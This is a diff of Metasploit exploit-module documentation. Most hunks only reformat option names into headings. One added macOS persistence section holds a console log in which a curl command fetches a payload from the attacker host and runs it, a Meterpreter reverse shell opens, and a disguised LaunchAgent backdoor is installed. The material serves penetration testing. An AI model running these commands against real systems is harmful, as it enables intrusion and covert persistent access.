@@ -108,4 +108,4 @@ systemctl reload nginx.service ``` If the script runs successfully, you should have a webserver serving the application on port 80. -Visit the website to complete the installation via the web installer. It will ask you to fill in the database name, user, and password. Those will be `qdpm_db`, `user`, and `pass` respectively. Then, create a password for your `admin@localhost.com` account and login with it. You can now create a second user to run the exploit against. \ No newline at end of file +Visit the website to complete the installation via the web installer. It will ask you to fill in the database name, user, and password. Those will be `qdpm_db`, `user`, and `pass` respectively. Then, create a password for your `admin@localhost.com` account and login with it. You can now create a second user to run the exploit against. diff --git a/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md b/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md index 9a9c9b7f77680..8403b60b78a99 100644 --- a/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md +++ b/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md @@ -34,10 +34,10 @@ msf exploit(rails_actionpack_inline_exec) > run To use this module, you must manually discover the correct values for these datastore options: -**TARGETURI** +### TARGETURI The path to a vulnerable Ruby on Rails application. -**TARGETPARAM** +### TARGETPARAM The target parameter to inject with inline code. diff --git a/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md b/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md index a78873f21415c..63fc69334829e 100644 --- a/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md +++ b/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md 
@@ -29,7 +29,7 @@ You can use . 3. `run` ## Options -**ENC_KEY** +### ENC_KEY The encryption key the target Apache Shiro server is using to encrypt its `rememberMe` cookies. ## Scenarios diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 39e72013c343f..008d6862fd2e7 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -35,14 +35,14 @@ This module has been tested successfully against: ## Options - **EnableOverwrite** +### EnableOverwrite Overwrites an app of the same name. Needed if you change the app code in the tgz. Default is `false` - **USERNAME** +### USERNAME Username for Splunk. Default is `admin` - **PASSWORD** +### PASSWORD Default is `changeme` ## Scenarios diff --git a/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md b/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md index 5b41ba303ab7e..61215793fbcab 100644 --- a/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md +++ b/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md @@ -16,11 +16,11 @@ https://mvnrepository.com/artifact/org.apache.struts/struts2-showcase ## Options -**TARGETURI** +### TARGETURI The path to a struts application action -**VHOST** +### VHOST The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional. diff --git a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md index 0c1caed2698ed..8d253def05aa1 100644 --- a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md +++ b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md 
@@ -107,11 +107,11 @@ echo "Struts container is listening on $IPADDRESS:$PORT_NUM" ## Options - **TARGETURI** +### TARGETURI The path to the struts application. Note that this does not include the endpoint. In the environment above, the path is `/`. - **ACTION** +### ACTION The endpoint name. In the environment above, the endpoint is `help.action`. diff --git a/documentation/modules/exploit/multi/http/struts2_rest_xstream.md b/documentation/modules/exploit/multi/http/struts2_rest_xstream.md index f9331fb9ef98e..7af5b9d609d35 100644 --- a/documentation/modules/exploit/multi/http/struts2_rest_xstream.md +++ b/documentation/modules/exploit/multi/http/struts2_rest_xstream.md @@ -14,11 +14,11 @@ https://mvnrepository.com/artifact/org.apache.struts/struts2-rest-showcase ## Options -**TARGETURI** +### TARGETURI The path to a struts application action -**VHOST** +### VHOST The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional. diff --git a/documentation/modules/exploit/multi/http/struts_dmi_exec.md b/documentation/modules/exploit/multi/http/struts_dmi_exec.md index 682c6e2d42902..929b10609354d 100644 --- a/documentation/modules/exploit/multi/http/struts_dmi_exec.md +++ b/documentation/modules/exploit/multi/http/struts_dmi_exec.md @@ -34,7 +34,7 @@ And now you have a vulnerable server. ## Options -**TMPPATH** +### TMPPATH By default, the struts_dmi_exec exploit should be ready to go without much configuration. However, in case you need to change where the payload should be uploaded to, make sure to set the correct diff --git a/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md b/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md index dd1c72f4872aa..26e786ead9fc3 100644 --- a/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md +++ b/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md 
@@ -34,7 +34,7 @@ And now you have a vulnerable server. ## Options -**TMPPATH** +### TMPPATH By default, the struts_dmi_rest_exec exploit should be ready to go without much configuration. However, in case you need to change where the payload should be uploaded to, make sure to set the correct diff --git a/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md b/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md index f41db2deaa738..9163570bc926a 100755 --- a/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md +++ b/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md @@ -25,17 +25,17 @@ vBulletin 5.x through 5.5.4 allows remote command execution via the `widgetConfi ## Options -**PHP_CMD** +### PHP_CMD Specify the PHP function in which you want execute the payload. Default: `shell_exec` -**TARGETURI** +### TARGETURI The base URI path of vBulletin. Default: / ### Advanced Options -**ForceExploit** +### ForceExploit Override check result. diff --git a/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md b/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md index 6ad92f78e1efd..fb9acf46670d6 100644 --- a/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md +++ b/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md 
@@ -12,7 +12,7 @@ which can then be executed by requesting the uploaded file location. ## Options -**PHPSHORTTAG** +### PHPSHORTTAG Specify the use of php short tag, `/com.system.update` + +### KEEPALIVE + +Continually restart the payload exe if it crashes/exits. Defaults to `true` + +### RUN_NOW + +Run the installed payload immediately. Defaults to `false` + +### LAUNCH_ITEM + +Type of launch item, see description for more info. Choices are `LaunchAgent`, `LaunchDaemon`. Default is `LaunchAgent` + +## Scenarios + +### 13.7.4 + +Initial access via web delivery + +``` +[*] Processing /root/.msf4/msfconsole.rc for ERB directives. +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111 +lhost => 111.111.1.111 +resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery +[*] Using configured payload python/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set target 8 +target => 8 +resource (/root/.msf4/msfconsole.rc)> set srvport 8383 +srvport => 8383 +resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp +payload => osx/x64/meterpreter_reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set lport 4747 +lport => 4747 +resource (/root/.msf4/msfconsole.rc)> set URIPATH m +URIPATH => m +resource (/root/.msf4/msfconsole.rc)> run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +[*] Started reverse TCP handler on 111.111.1.111:4747 +[*] Using URL: http://111.111.1.111:8383/m +[*] Server started. 
+[*] Run the following command on the target machine: +curl -sk --output 8D4tNTA4 http://111.111.1.111:8383/m; chmod +x 8D4tNTA4; ./8D4tNTA4& disown +[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > +[*] 222.22.2.2 web_delivery - Delivering Payload (815032 bytes) +[*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49156) at 2025-02-19 19:04:25 -0500 +[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/osx/persistence/launch_plist +[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp +[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > sessions -i 1 +[*] Starting interaction with 1... +(Meterpreter 1)(/Users/macos) > getuid +Server username: macos +(Meterpreter 1)(/Users/macos) > sysinfo +Computer : 20.20.20.21 +OS : macOS Ventura (macOS 13.7.4) +Architecture : x86 +BuildTuple : x86_64-apple-darwin +Meterpreter : x64/osx +``` + +Persistence + +``` +[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > set session 1 +session => 1 +[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > set payload payload/osx/x64/meterpreter_reverse_tcp +payload => osx/x64/meterpreter_reverse_tcp +[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. +[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > +[*] Started reverse TCP handler on 111.111.1.111:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. /Users/macos/Library is writable +[*] Dropping backdoor executable... +[+] Backdoor stored to /Users/macos/Library/.QVecGcAF/com.system.update +[+] LaunchAgent added: /Users/macos/Library/LaunchAgents/com.system.update.plist +[+] LaunchAgent installed successfully. 
+[*] To remove the persistence, run: +rm -rf /Users/macos/Library/.QVecGcAF ; rm /Users/macos/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update +[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250219.0704/20.20.20.21_20250219.0704.rc +[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > sessions -i 1 +[*] Starting interaction with 1... +(Meterpreter 1)(/Users/macos) > shell +Process 2138 created. +Channel 8 created. +launchctl load -w /Users/macos/Library/LaunchAgents/com.system.update.plist +[*] Meterpreter session 5 opened (111.111.1.111:4444 -> 222.22.2.2:49157) at 2025-02-19 19:11:23 -0500 +``` diff --git a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md index 826941c1d0a46..651f20c3b0abc 100644 --- a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md +++ b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md @@ -32,11 +32,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md b/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md index 68707775e77ee..8f1bfbcec0ccb 100644 --- a/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md @@ -38,15 +38,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions`. - **DTAPPGATHER_PATH** +### DTAPPGATHER_PATH Path to `dtappgather` executable. (default: `/usr/dt/bin/dtappgather`) - **SUID_PATH** +### SUID_PATH Path to suid executable. (default: `/usr/bin/at`) 
diff --git a/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md b/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md index a54c6741475b1..0a7b0138532b9 100644 --- a/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md @@ -32,11 +32,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **SUID_PATH** +### SUID_PATH Path to suid executable (must be linked to a vulnerable version of `libnspr4.so`) (default: `/usr/bin/cancel`) diff --git a/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md b/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md index 8c55a8b014b4b..42ddf4cc8f1c1 100644 --- a/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md @@ -40,15 +40,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions`. - **RSH_PATH** +### RSH_PATH Path to rsh executable. (default: `/usr/bin/rsh`) - **WORKERS** +### WORKERS Number of workers. (default: `10`) diff --git a/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md b/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md index 3126d0fd5e7e9..022a2f546ea2f 100644 --- a/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **XSCREENSAVER_PATH** +### XSCREENSAVER_PATH Path to `xscreensaver` executable. (default: `/usr/bin/xscreensaver`) - **XORG_PATH** +### XORG_PATH Path to `Xorg` executable. (default: `/usr/bin/Xorg`) 
diff --git a/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md b/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md index 534503e203af2..cab5a4d22a9d1 100644 --- a/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md +++ b/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md @@ -14,7 +14,7 @@ ## Options - **USE_POPEN** +### USE_POPEN When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid When the option is set to `false`, target 2 (PS file) is valid diff --git a/documentation/modules/exploit/unix/http/pfsense_clickjacking.md b/documentation/modules/exploit/unix/http/pfsense_clickjacking.md index f286991927517..96eb3b840ddf8 100644 --- a/documentation/modules/exploit/unix/http/pfsense_clickjacking.md +++ b/documentation/modules/exploit/unix/http/pfsense_clickjacking.md @@ -18,6 +18,6 @@ The victim should be able to access the WebGUI & must be logged in as admin in o ## Options -**TARGETURI** +### TARGETURI The base path of the WebGUI. The default base path is https://192.168.1.1/ diff --git a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md index 38f8bacaa938c..c0574cd9863ba 100644 --- a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md +++ b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md @@ -26,7 +26,7 @@ ## Options - **AGENT_VERSION** +### AGENT_VERSION A valid Windows agent version must be specified. (default: `8.0.152`) @@ -35,11 +35,11 @@ Additionally, various agent versions are listed on the KACE website. - **ORGANIZATION** +### ORGANIZATION Organization ID used within the appliance. (default: `1`) - **SERIAL** +### SERIAL Serial number for the appliance. By default, the module attempts to retrieve the serial from `/common/about.php`. 
diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 42fb1969d4475..4d67511934735 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -19,7 +19,7 @@ This module exploits an inadequate access control vulnerability creating a malic This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, and you're ready to go. -**NEW_PASSWORD** +### NEW_PASSWORD You should set a new SSH password to the vulnerable device. diff --git a/documentation/modules/exploit/unix/local/netbsd_mail_local.md b/documentation/modules/exploit/unix/local/netbsd_mail_local.md index 695649aed56ab..81aadf8ecb631 100644 --- a/documentation/modules/exploit/unix/local/netbsd_mail_local.md +++ b/documentation/modules/exploit/unix/local/netbsd_mail_local.md @@ -91,16 +91,16 @@ Background session 1? [y/N] y ## Options - **ATRUNPATH** +### ATRUNPATH File location of atrun, defaults to `/usr/libexec/atrun` - **MAILDIR** +### MAILDIR Location of mail folder, defaults to `/var/mail` - **WritableDir** +### WritableDir Location of a writable directory for our payload, defaults to `/tmp` - **ListenerTimeout** +### ListenerTimeout Since this exploit utilized a cron which has a 10min timer, the listener timeout needs to be 10min + padding. Defaults to `603` seconds (10min, 3sec) ## Scenarios @@ -200,4 +200,4 @@ sHXbQbHqFIbnZGoFWlZoppGprWyKwFCr nDpSrEmQhDuVSxIpILWCOABbMOIAWUTx whoami root -``` \ No newline at end of file +``` diff --git a/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md index 4665830e68f19..1db242090a988 100644 --- a/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md +++ b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md 
@@ -19,7 +19,7 @@ Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that / ## Options -**MAILTO** +### MAILTO A valid e-mail recipient. Usually, admin@targetdomain.com can be used. diff --git a/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md b/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md index 10dfbca68ab39..e7bf45bf6c4c6 100644 --- a/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md @@ -20,11 +20,11 @@ This module has been tested with [Ajenti 2.1.31](https://pypi.org/project/ajenti ## Options -**RPORT** +### RPORT Set this to the Ajenti port. The default is 8000. -**TARGETURI** +### TARGETURI Set this to the Ajenti base path. The default is `/`. diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index ad946cc7b4f5c..86bcb29d61e86 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md 
@@ -43,32 +43,32 @@ viable in that regard. ## Options -**TARGETURI** +### TARGETURI Set this to the remote path of the vulnerable Drupal install. Defaults to `/` for the web root. -**PHP_FUNC** +### PHP_FUNC Set this to the PHP function you'd like to execute. Defaults to `passthru`. -**DUMP_OUTPUT** +### DUMP_OUTPUT Enable this if you'd like to see HTTP responses, including command output. Defaults to `false` unless `cmd/unix/generic` is your payload. -**VERBOSE** +### VERBOSE Enable this to show what function and command were executed. Defaults to `false` due to the sometimes excessive output. -**ForceExploit** +### ForceExploit Enable this to force exploitation regardless of the check result. Defaults to `false`, meaning the check result is respected. -**WritableDir** +### WritableDir Set this to a writable directory without `noexec` for binary payloads. Defaults to `/tmp`, but other options may include `/var/tmp` and diff --git a/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md b/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md index 27341f39468ea..a553cb41130f3 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md +++ b/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md @@ -36,16 +36,16 @@ Id Name ## Options -**METHOD** +### METHOD Set this to the HTTP method to use. `POST` and `GET` (cached) are known to work. -**NODE** +### NODE Set this to a node ID on the target when using the `GET` method. -**DUMP_OUTPUT** +### DUMP_OUTPUT Enable this if you'd like to see HTTP responses, including command output. Defaults to `false` unless `cmd/unix/generic` is your payload. diff --git a/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md b/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md index 612710e193173..db0734fc4fd76 100644 
--- a/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md @@ -49,7 +49,7 @@ ## Options - **TARGETURI** +### TARGETURI The base path to elFinder (default: `/elFinder/`) diff --git a/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md b/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md index 48d9b03a177b7..e7f39c4c21e0c 100644 --- a/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md @@ -32,15 +32,15 @@ ## Options - **TARGETURI** +### TARGETURI The base path to FusionPBX (default: `/`) - **USERNAME** +### USERNAME The username for FusionPBX (default: `admin`) - **PASSWORD** +### PASSWORD The password for FusionPBX diff --git a/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md b/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md index 70923bdaf7c57..d6ccaa0f265af 100644 --- a/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md @@ -55,15 +55,15 @@ ## Options - **TARGETURI** +### TARGETURI The base path to FusionPBX (default: `/`) - **USERNAME** +### USERNAME The username for FusionPBX - **PASSWORD** +### PASSWORD The password for FusionPBX diff --git a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md index 97886923ca855..20ed452da2e7a 100644 --- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md +++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md 
@@ -27,7 +27,7 @@ Id Name ## Options -**TARGETURI** +### TARGETURI Set this to the base path of jQuery File Upload. `/jQuery-File-Upload` and those including a version are common. `/upload` may be another. diff --git a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md index e81ee1c877e69..2c8985debc1aa 100644 --- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md +++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md @@ -25,15 +25,15 @@ ## Options - **TARGETURI** +### TARGETURI The URI path for OpenMediaVault installation - **USERNAME** +### USERNAME The username for OpenMediaVault - **PASSWORD** +### PASSWORD The password for OpenMediaVault diff --git a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md index 2ba01b30fb3b8..c475fe859a416 100644 --- a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md @@ -24,7 +24,7 @@ Launch metasploit and set the appropriate options: ## Options -**VHOST** +### VHOST The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional. diff --git a/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md b/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md index 7e59153c7f58f..5b4f70c00428d 100644 --- a/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md +++ b/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md 
@@ -72,15 +72,15 @@ This example assumes your MySQL root password is **password** ## Options -**TARGETURI** +### TARGETURI Path of the Piwik installation. -**USERNAME** +### USERNAME Valid username for a Piwik superuser account. -**PASSWORD** +### PASSWORD Valid password for a Piwik superuser account. diff --git a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md index 40c91525ae8ab..7c3e6f2d32ab9 100644 --- a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md @@ -24,7 +24,7 @@ ## Options - **TARGETURI** +### TARGETURI The base path to rConfig install directory (default: `/install/`) diff --git a/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md b/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md index 422c58d9cd92c..6cabe11d88345 100644 --- a/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md +++ b/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md @@ -8,7 +8,7 @@ This module has been tested with [Webmin 1.900](https://sourceforge.net/projects ## Options -**GUESSUPLOAD** +### GUESSUPLOAD Use default installation path `/usr/share/webmin/` diff --git a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md index d85a30f52fa25..6a7c40eb3b9f6 100644 --- a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md +++ b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md @@ -22,7 +22,7 @@ This was tested on Ubuntu 15.04. YMMV. ## Options -**VERBOSE** +### VERBOSE If you'd like to see what requests are being sent, set this to `true`. You should see the Exim prestager commands being sent to the target. 
diff --git a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md index 72ff66756acd4..8323349046625 100644 --- a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md +++ b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md @@ -27,15 +27,15 @@ ## Options - **TARGETURI** +### TARGETURI The base path to WordPress (default: `/`) - **USERNAME** +### USERNAME The username for WordPress - **PASSWORD** +### PASSWORD The password for WordPress diff --git a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md index 711bcfaa6b046..c277e8a33e1e4 100644 --- a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md @@ -50,15 +50,15 @@ ## Options - **TARGETURI** +### TARGETURI The base path to Xymon secure CGI directory (default: `/xymon-seccgi/`) - **USERNAME** +### USERNAME The username for Xymon - **PASSWORD** +### PASSWORD The password for Xymon diff --git a/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md b/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md index b900f06a9e20b..0ed511716cdb0 100644 --- a/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md +++ b/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md @@ -15,11 +15,11 @@ ## Options - **CMD** +### CMD Optional command line to run instead of attempting to directly inject a payload - **RPORT** +### RPORT The port the service is running on. Default is 38292. diff --git a/documentation/modules/exploit/windows/backupexec/ssl_uaf.md b/documentation/modules/exploit/windows/backupexec/ssl_uaf.md index 969c4344f047a..34c5a685427a5 100644 --- a/documentation/modules/exploit/windows/backupexec/ssl_uaf.md 
+++ b/documentation/modules/exploit/windows/backupexec/ssl_uaf.md @@ -156,16 +156,16 @@ few exploit-specific options. These should not normally need to be set or changed from their default values in most situations as the exploit will pick suitable values for them depending on the target selected. -**NumSpraySockets** +### NumSpraySockets The number of sockets connected to the remote agent in order to spray stage 1 of the exploit, which should overwrite the freed `BIO`. -**NumTLSSpraySockets** +### NumTLSSpraySockets The number of sockets connected to the remote agent in order to spray TLS extensions. This is used to massage the low fragmentation heap in order to increase chances of stage 1 successfully overwriting the freed `BIO`. -**NumTriggerAttempts** +### NumTriggerAttempts The number of attempts made to trigger the use-after-free for Windows 8+ targets, where it is possible to retry calling the overwritten function pointer multiple times. diff --git a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md index 23c817909fbc9..723fdf5393a40 100644 --- a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md +++ b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md @@ -11,11 +11,11 @@ This module exploits the Windows OLE Automation array vulnerability, [CVE-2014-6 ## Options -**TRYUAC** +### TRYUAC Ask victim to start as Administrator. This option only works on Windows 7 targets. -**AllowPowershellPrompt** +### AllowPowershellPrompt Allow exploit to try Powershell. If exploiting a Windows 7 target you need to enable this option. diff --git a/documentation/modules/exploit/windows/fileformat/adobe_geticon.md b/documentation/modules/exploit/windows/fileformat/adobe_geticon.md index 6710c1bca32d8..ff48defb7ec4d 100644 --- a/documentation/modules/exploit/windows/fileformat/adobe_geticon.md 
+++ b/documentation/modules/exploit/windows/fileformat/adobe_geticon.md @@ -20,7 +20,7 @@ Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/downl ## Options - **FILENAME** +### FILENAME The file name diff --git a/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md b/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md index 7e1a1693fc80c..9ef8f51f1311a 100644 --- a/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md +++ b/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md @@ -19,19 +19,19 @@ Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/downl ## Options - **EXENAME** +### EXENAME The Name of payload exe. - **FILENAME** +### FILENAME The output filename. - **INFILENAME** +### INFILENAME The Input PDF filename. - **LAUNCH_MESSAGE** +### LAUNCH_MESSAGE The message to display in the `File:` area of the PDF. diff --git a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md index 9f3b6e28c8a82..f193abbd790a9 100644 --- a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md +++ b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md @@ -22,11 +22,11 @@ Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/downl ## Options - **FILENAME** +### FILENAME The file name. - **OBFUSCATE** +### OBFUSCATE Enable JavaScript obfuscation diff --git a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md index b154a0f312831..42572705df94f 100644 --- a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md +++ b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md 
